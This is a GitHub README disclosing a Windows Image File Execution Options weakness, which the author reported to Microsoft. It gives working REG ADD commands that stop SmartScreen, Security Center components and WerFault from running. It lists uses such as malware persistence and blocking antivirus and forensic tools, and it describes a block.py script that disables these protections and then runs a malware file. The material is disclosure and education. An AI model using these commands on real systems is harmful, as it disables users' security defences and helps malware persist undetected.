Skip to content

Blocking smartscreen, security center, forensic processes and 3rd party security applications on Windows Operating Systems

Notifications You must be signed in to change notification settings

abdulkadir-gungor/Block_Smartscreen_and_Security_Center_on_Windows_Operating_Systems

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

Block Smartscreen and Security Center on Windows Operating Systems

  On the evening of May 29 (2022), I made the necessary notifications to the "Microsoft Security Center" [ VULN-068278]. However, according to the reply received by e-mail on June 10, "We determined that an immediate fix will not be released for the reported behavior. It was recommended to hardened because the relevant vulnerability requires Administrator authority. We have closed this case" . For this reason, I wanted to warn users by posting this vulnerability or weakness in my account on Github.

  If any executable file is added to ("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options") the regedit path and a debugger flag is set, another program can be run before that program is run. If the program that is run first does not invoke the relevant program in any way, it can replace the relevant program. This can prevent various important programs from running. This is valid for important processes of Windows.

  For example, if you want to block Smartscreen

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"

  For example, if you want to block Security Center (Windows Defender and other tools)

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securityhealthhost.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secHealthUI.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\werFault.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
The purposes of using this vulnerability can basically be listed as follows.
1) It can provide persistence for malware software.
2) Although it is different in function and structure, similar attacks that can be made by interfering with the system call table can also be made using this vulnerability.
3) Security measures such as Smartscreen, Windows Defender, etc. that come integrated with Windows can be blocked. For example, although Windows Defender cannot be blocked directly, Windows Defender is prevented from running by preventing the components necessary for it to work. In the example, Windows Security Center has been prevented from working, and related components have become inoperable.
4) In particular, third-party virus scanning and security software can be blocked. Also, any other third-party software may be blocked from running.
5) Processes used for forensic purposes that are integrated with Windows can be blocked.
6) By blocking the components necessary for the operation of Windows, operations such as "sending error reports" and "receiving updates" can be rendered inoperable. For example, by blocking the "calcs" command, access to certain folders and files can be prevented by preventing the user and Windows from accessing the access control list.

Video and Screenshots of the Vulnerability

  A simple video has been posted on Youtube to demonstrate the vulnerability. It can be viewed at the link below.

[Youtube Link] https://www.youtube.com/watch?v=_rQrLeDaFSU

[ScreenShot 1] e3

[ScreenShot 2] e4

[ScreenShot 3] e6

Exploiting the Vulnerability

  As an example, a script has been written to show how a malware can exploit this vulnerability. The "block.py" script has been added to the files as an example in order to represent what we call the first stage in malware attacks.

  It primarily blocks Smartscreen and Windows Security from working. In this way, Windows Defender cannot work. Then it runs the malware

block.py

(Administrator authority)>> block.py malware.exe

Additional information on malwares

  In order to evaluate the vulnerability, basic information about malware-type attacks is given.

A) Ideal Malware Attacks

malware_1 [jpg source: From the training notes, Abdulkadir GÜNGÖR]

B) Types of Malware

malware_2_type [jpg source: From the book "Linux İşletim Sisteminde Malware Analizi", Abdulkadir GÜNGÖR, ISBN:978-625-409-378-4]

C) Final Stage

malware_3 [jpg source: From the training notes, Abdulkadir GÜNGÖR]

Disclaimer

  Information and projects published by me on Github are entirely at the user's own risk. I'm not responsible in any way for any kind of damage that is done to your computer / os / program as cause of this project. Make sure to use virtual systems as a test environment!

Legal Warning

  Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.